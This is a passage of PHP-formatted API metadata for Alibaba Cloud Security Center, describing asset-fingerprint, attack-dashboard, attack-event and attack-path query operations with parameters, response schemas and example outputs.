'云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAssetsPropertyDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4C1AE3F3-18FA-4108-BBB9-AFA1A032****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 23,\\n \\"Count\\": 20,\\n \\"NextToken\\": \\"AAAAAV3MpHK1AP0pfERHZN5pu6k+AtdhNE3kgQEK36GujZ5on+tWdc+4WoaoMP/kUNxxxx\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"ModuleName\\": \\"alihids\\",\\n \\"Size\\": 10,\\n \\"Filepath\\": \\"/lib/modules/4****\\",\\n \\"UsedByCount\\": 0,\\n \\"Path\\": \\"/lib/systemd/system****\\",\\n \\"ServerType\\": \\"nginx\\",\\n \\"Port\\": \\"80\\",\\n \\"Pid\\": \\"813\\",\\n \\"ListenProtocol\\": \\"tcp\\",\\n \\"ProcessStarted\\": 1671186801000,\\n \\"WebPath\\": \\"/usr/share/nginx/html\\",\\n \\"Domain\\": \\"localhost\\",\\n \\"User\\": \\"root\\",\\n \\"PathMode\\": \\"755\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"IntranetIp\\": \\"100.104.XX.XX\\",\\n \\"InternetIp\\": \\"47.42.XX.XX\\",\\n \\"Ip\\": \\"47.42.XX.XX\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"CreateTimestamp\\": 1649149566000,\\n \\"ImageName\\": \\"registry-vpc.cn-beijing.aliyuncs.com/acs/aliyun-ingress-controller****\\",\\n \\"ContainerName\\": \\"5-rce_web_1\\",\\n \\"ModelName\\": \\"阿里云百炼\\",\\n \\"EndPoint\\": \\"dashscope.aliyuncs.com\\",\\n \\"File\\": \\"/root/llm.py\\",\\n \\"MiddlewareName\\": \\"vllm\\",\\n \\"MiddlewareVersion\\": \\"1.0.1\\",\\n \\"InstallationPath\\": \\"/etc/pip3/env/vllm\\",\\n \\"RepoName\\": \\"ACR-Example\\",\\n \\"RepoNamespace\\": \\"Default\\",\\n \\"Tag\\": \\"AI\\",\\n \\"ImageDigest\\": \\"ImageDigest\\",\\n \\"Agent\\": \\"Mozilla/5.0 (Windows NT 10.0%3B Win64%3B x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0\\",\\n \\"SkillsName\\": \\"Analytics and Data Analysis\\",\\n \\"McpName\\": \\"@modelcontextprotocol/server-github\\",\\n \\"Description\\": \\"{\'Type\': \'text\', \'Value\': u\'\\\\\\\\u786e\\\\\\\\u4fdd\\\\\\\\u7f51\\\\\\\\u5173\\\\\\\\u5b89\\\\\\\\u5168\\\\\\\\u9632\\\\\\\\u62a4\\\\\\\\u3002\\\\\\\\u8981\\\\\\\\u6c42\\\\\\\\uff1a\\\\\\\\u5f00\\\\\\\\u542fWAF\\\\\\\\u9632\\\\\\\\u706b\\\\\\\\u5899\\\\\\\\u9632\\\\\\\\u62a4\\\\\\\\u529f\\\\\\\\u80fd\\\\\\\\u3002\'}\\",\\n \\"TransportName\\": \\"test\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetAssetsPropertyItem' => [ 'summary' => 'Queries the aggregated list of Asset Fingerprints for startup items, kernel modules, or websites.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- zh: Chinese'."\n" .'- en: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcefully refresh the data to be queried. Valid values:'."\n" .'- **true**: Forcefully refresh.'."\n" .'- **false**: Do not forcefully refresh.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'Biz', 'in' => 'query', 'schema' => ['description' => 'The type of Asset Fingerprints to query. Default value: **sca**. Valid values:'."\n" ."\n" .'- **lkm**: kernel module'."\n" .'- **autorun**: startup item'."\n" .'- **web_server**: website.', 'type' => 'string', 'required' => true, 'example' => 'lkm', 'title' => ''], ], [ 'name' => 'SearchItem', 'in' => 'query', 'schema' => ['description' => 'The type of query condition. Set different aggregation search conditions based on the **Biz** parameter. Valid values:'."\n" .'- If **Biz** is set to **web_server**, the following search conditions are supported for **SearchItem**:'."\n" .' - **domain**: domain name'."\n" .'- If **Biz** is set to **lkm**, the following search conditions are supported for **SearchItem**:'."\n" .' - **module_name**: module name'."\n" .'- If **Biz** is set to **autorun**, the following search conditions are supported for **SearchItem**:'."\n" .' - **path**: startup item path'."\n" .'> The **SearchItem** and **SearchInfo** parameters must be used together. Both parameters must be set at the same time for the query to take effect. Setting only one parameter does not take effect. You can use these parameters to query all data of a specific Asset Fingerprints entry by name.', 'type' => 'string', 'required' => false, 'example' => 'path', 'title' => ''], ], [ 'name' => 'SearchInfo', 'in' => 'query', 'schema' => ['description' => 'The content to query. Specify different query content based on the value of **SearchItem**:'."\n" .'- If **SearchItem** is set to **domain**, enter the domain name of the Asset Fingerprints entry.'."\n" .'- If **SearchItem** is set to **module_name**, enter the module name of the Asset Fingerprints entry.'."\n" .'- If **SearchItem** is set to **path**, enter the startup item path of the Asset Fingerprints entry.'."\n" ."\n" .'> The **SearchItem** and **SearchInfo** parameters must be used together. Both parameters must be set at the same time for the query to take effect. Setting only one parameter does not take effect. You can use these parameters to query all data of a specific Asset Fingerprints entry by name.', 'type' => 'string', 'required' => false, 'example' => '/lib/systemd/s****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'minimum' => '1', 'default' => '1', 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page when using paging. Default value: 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'maximum' => '1000', 'minimum' => '1', 'default' => '20', 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '340D7FC4-D575-1661-8ACD-CFA7BE57****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information for the query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of aggregated Asset Fingerprints entries displayed on each page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of aggregated Asset Fingerprints entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of aggregated Asset Fingerprints entries displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'The collection of aggregated Asset Fingerprints entries.', 'type' => 'array', 'items' => [ 'description' => 'The aggregated Asset Fingerprints entry.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The number of servers associated with the aggregated Asset Fingerprints entry.', 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'Path' => ['description' => 'The startup item path.'."\n" .'> This parameter is returned only when **Biz** is set to **autorun**.', 'type' => 'string', 'example' => 'C:/Program Files/****', 'title' => ''], 'ModuleName' => ['description' => 'The module name.'."\n" .'> This parameter is returned only when **Biz** is set to **lkm**.', 'type' => 'string', 'example' => 'alihids', 'title' => ''], 'Domain' => ['description' => 'The domain name.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => 'localhost', 'title' => ''], 'MiddlewareName' => ['description' => 'The AI tool name.', 'type' => 'string', 'example' => 'vllm', 'title' => ''], 'ModelName' => ['description' => 'The large language model service name.', 'type' => 'string', 'example' => 'Deepseek', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset fingerprints aggregated list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetsPropertyItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAssetsPropertyItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"340D7FC4-D575-1661-8ACD-CFA7BE57****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 45,\\n \\"Count\\": 20\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"Count\\": 23,\\n \\"Path\\": \\"C:/Program Files/****\\",\\n \\"ModuleName\\": \\"alihids\\",\\n \\"Domain\\": \\"localhost\\",\\n \\"MiddlewareName\\": \\"vllm\\",\\n \\"ModelName\\": \\"Deepseek\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetAttackEventDashboard' => [ 'summary' => 'Retrieves attack analysis dashboard information.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '158251', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The timestamp of the start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1752548337284'], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1753153137284'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'AttackAllCount' => ['description' => 'The total number of attacks.', 'type' => 'integer', 'format' => 'int32', 'example' => '18', 'title' => ''], 'LatestTimeHourCount' => [ 'description' => 'The list of attack counts aggregated by hour.', 'type' => 'array', 'items' => [ 'description' => 'The statistics object.', 'type' => 'object', 'properties' => [ 'StatisticsValue' => ['description' => 'The statistics value.', 'type' => 'string', 'example' => '1752642000000', 'title' => ''], 'StatisticsCount' => ['description' => 'The count of the statistics value.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AttackTypeTopCount' => [ 'description' => 'The list of attack counts aggregated by attack type.', 'type' => 'array', 'items' => [ 'description' => 'The statistics object.', 'type' => 'object', 'properties' => [ 'StatisticsValue' => ['description' => 'The statistics value.', 'type' => 'string', 'example' => 'PHP Webshell Upload', 'title' => ''], 'StatisticsCount' => ['description' => 'The count of the statistics value.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'SrcIpTopCount' => [ 'description' => 'The list of attack counts aggregated by Attack Source IP Addresses.', 'type' => 'array', 'items' => [ 'description' => 'The statistics object.', 'type' => 'object', 'properties' => [ 'StatisticsValue' => ['description' => 'The statistics value.', 'type' => 'string', 'example' => '140.205.11.**', 'title' => ''], 'StatisticsCount' => ['description' => 'The count of the statistics value.', 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AttackInstanceTopCount' => [ 'description' => 'The list of attack counts aggregated by attacked asset.', 'type' => 'array', 'items' => [ 'description' => 'The statistics object.', 'type' => 'object', 'properties' => [ 'StatisticsValue' => ['description' => 'The statistics value.', 'type' => 'string', 'example' => '{\\"internetIp\\":\\"101.37.86.**\\",\\"instanceName\\":\\"na**me\\",\\"intranetIp\\":\\"10.1.0.*\\"}', 'title' => ''], 'StatisticsCount' => ['description' => 'The count of the statistics value.', 'type' => 'integer', 'format' => 'int32', 'example' => '18', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the API call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the API request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned. A value of 200 indicates that the request was successful.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve attack analysis dashboard information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackEventDashboard', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"AttackAllCount\\": 18,\\n \\"LatestTimeHourCount\\": [\\n {\\n \\"StatisticsValue\\": \\"1752642000000\\",\\n \\"StatisticsCount\\": 1\\n }\\n ],\\n \\"AttackTypeTopCount\\": [\\n {\\n \\"StatisticsValue\\": \\"PHP Webshell Upload\\",\\n \\"StatisticsCount\\": 5\\n }\\n ],\\n \\"SrcIpTopCount\\": [\\n {\\n \\"StatisticsValue\\": \\"140.205.11.**\\",\\n \\"StatisticsCount\\": 17\\n }\\n ],\\n \\"AttackInstanceTopCount\\": [\\n {\\n \\"StatisticsValue\\": \\"{\\\\\\\\\\\\\\"internetIp\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"101.37.86.**\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"instanceName\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"na**me\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"intranetIp\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"10.1.0.*\\\\\\\\\\\\\\"}\\",\\n \\"StatisticsCount\\": 18\\n }\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'GetAttackEventDetail' => [ 'summary' => 'Retrieves the details of an attack analysis event.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '158251', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the alert event.', 'type' => 'string', 'required' => false, 'example' => '18825544674********', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Payload' => ['description' => 'The attack payload.', 'type' => 'string', 'example' => '301f02010104067075626c6963a51202017602010002017f3007300506012b0500', 'title' => ''], 'CveBeans' => [ 'description' => 'The list of CVE vulnerabilities associated with the attack.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the CVE vulnerability.', 'type' => 'string', 'example' => 'CVE-2023-39964', 'title' => ''], 'Name' => ['description' => 'The name of the CVE vulnerability.', 'type' => 'string', 'example' => '1Panel loadfile 后台文件读取漏洞', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" .'- **true**: The API call was successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The result message. The value is fixed as **success**, which indicates that the export was successful.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve attack analysis event details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackEventDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Payload\\": \\"301f02010104067075626c6963a51202017602010002017f3007300506012b0500\\",\\n \\"CveBeans\\": [\\n {\\n \\"Id\\": \\"CVE-2023-39964\\",\\n \\"Name\\": \\"1Panel loadfile 后台文件读取漏洞\\"\\n }\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'GetAttackPathEventDetail' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226499', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The event ID.'."\n" .'> You can call [ListAttackPathEvent](~~ListAttackPathEvent~~) to query event IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'EventSource', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The data source. Default value: **default**. Valid values:'."\n" .'- **caasm**: attack surface'."\n" .'- **default**: attack path.', 'type' => 'string', 'example' => 'default', 'required' => false], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'AttackPathEvent' => [ 'description' => 'The details of the attack path event.', 'type' => 'object', 'properties' => [ 'DstAsset' => [ 'description' => 'The destination asset.', 'type' => 'object', 'properties' => [ 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'i-bp18ifsr1tu1dx39****'."\n", 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SensitiveAssetFlag' => ['description' => 'The sensitive asset flag. Valid values:'."\n" .'- **0**: Not a sensitive asset.'."\n" .'- **1**: A sensitive asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'FirstTime' => ['description' => 'The timestamp when the event first occurred. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1735956726000', 'title' => ''], 'LastTime' => ['description' => 'The timestamp when the event was last detected. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1741832168000', 'title' => ''], 'PathEventEdgeList' => [ 'description' => 'The list of path event edges.', 'type' => 'array', 'items' => [ 'description' => 'The path event edge.', 'type' => 'object', 'properties' => [ 'EdgeId' => ['description' => 'The edge ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'EdgeType' => ['description' => 'The edge type.', 'type' => 'string', 'example' => 'role_trust_user', 'title' => ''], 'ElementType' => ['description' => 'The element type of the edge.', 'type' => 'string', 'example' => 'branch', 'title' => ''], 'EndNodeUuid' => ['description' => 'The UUID of the end node of the edge.', 'type' => 'string', 'example' => '52d59cca9d1768bab5fe081317637990', 'title' => ''], 'RepairSuggestionDisplay' => ['description' => 'The description of the remediation suggestion.', 'type' => 'string', 'example' => 'The RAM role is granted the administrator permissions and trusts the user of another Alibaba Cloud account. In this case, the current Alibaba Cloud account may be fully controlled by the trusted Alibaba Cloud account. We recommend that you delete the trust relationship. If you need to trust another Alibaba Cloud account, we recommend that you split your business requirements and follow the principle of least privilege to grant permissions across accounts in a fine-grained manner. You can also use RAM.\\n\\nIf you confirm that the role does not need to trust an Alibaba Cloud account, perform the following operations: In the RAM console, click the required RAM role. On the page that appears, view the trust policy of the role. Then, edit the Service field to delete the trust relationship. If you confirm that permissions can be reduced, perform the following operations: In the RAM console, click the required RAM role. On the page that appears, view the permissions of the role. Then, find the policy that defines the administrator permissions and revoke the policy. Attach another policy to the role based on your business requirements.', 'title' => ''], 'StartNodeUuid' => ['description' => 'The UUID of the start node of the edge.', 'type' => 'string', 'example' => 'b7e1bd42c4ca47f69020f4a27b47d2b4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PathEventNodeList' => [ 'description' => 'The list of path nodes.', 'type' => 'array', 'items' => [ 'description' => 'The path node.', 'type' => 'object', 'properties' => [ 'ElementType' => ['description' => 'The element type of the node.', 'type' => 'string', 'example' => 'branch', 'title' => ''], 'NodeDetail' => ['description' => 'The node details.', 'type' => 'string', 'example' => '{"assetId":0}', 'title' => ''], 'NodeName' => ['description' => 'The node name.', 'type' => 'string', 'example' => 'hypermatch_uploader', 'title' => ''], 'NodeType' => ['description' => 'The node type.', 'type' => 'string', 'example' => 'user', 'title' => ''], 'NodeUuid' => ['description' => 'The node UUID.', 'type' => 'string', 'example' => '52d59cca9d1768bab5fe081317637990', 'title' => ''], 'SensitiveAssetFlag' => ['description' => 'The sensitive asset flag. Valid values:'."\n" .'- **0**: Not a sensitive asset.'."\n" .'- **1**: A sensitive asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AiAssetFlag' => ['title' => '', 'description' => 'The AI asset flag. Valid values:'."\n" .'- **0**: Not an AI asset.'."\n" .'- **1**: An AI asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PathName' => ['description' => 'The path name.', 'type' => 'string', 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], 'PathNameDesc' => ['description' => 'The description of the path name.', 'type' => 'string', 'example' => 'ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User', 'title' => ''], 'PathType' => ['description' => 'The path type.', 'type' => 'string', 'example' => 'role_escalation', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level.', 'type' => 'string', 'example' => 'suspicious', 'title' => ''], 'SrcAsset' => [ 'description' => 'The source asset.', 'type' => 'object', 'properties' => [ 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '14', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'i-25b24****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SensitiveAssetFlag' => ['description' => 'The sensitive asset flag. Valid values:'."\n" .'- **0**: Not a sensitive asset.'."\n" .'- **1**: A sensitive asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PathTypeDesc' => ['description' => 'The description of the path type.', 'type' => 'string', 'example' => 'Privilege Escalation by Role', 'title' => ''], 'PathDetailDesc' => ['description' => 'The description of the path details.', 'type' => 'string', 'example' => 'The system detects that the role that trusts another Alibaba Cloud account has administrator permissions. This can cause the system to be fully controlled. We recommend that you delete the trust relationship and review the permissions of the role.'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query attack path event details', 'summary' => 'Queries the details of an attack path event.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackPathEventDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": 